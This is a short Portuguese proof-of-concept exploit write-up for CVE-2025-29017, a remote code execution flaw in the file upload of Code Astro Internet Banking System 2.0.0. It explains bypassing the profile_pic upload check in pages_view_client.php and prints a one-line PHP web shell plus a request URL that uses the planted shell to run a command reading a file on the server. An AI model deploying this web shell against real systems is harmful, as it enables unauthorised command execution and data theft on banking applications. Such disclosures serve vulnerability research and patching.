
Exploit de prova de conceito para CVE-2025-29017, demonstrando execução remota de código por meio de upload de arquivo malicioso no Code Astro Internet Banking System 2.0.0.
Uma vulnerabilidade de Execução Remota de Código (RCE) existe no Code Astro Internet Banking System 2.0.0 devido à validação inadequada de upload de arquivos no parâmetro profile_pic dentro de pages_view_client.php. Atacantes podem contornar as verificações de segurança modificando a requisição de upload, levando à execução arbitrária de código.
profile_pic em pages_view_client.php


<?php system($_GET['cmd']); ?>


http://IP:PORT/InternetBanking-php/admin/dist/img/image.jpeg.php?cmd=type C:\Users\file.txt
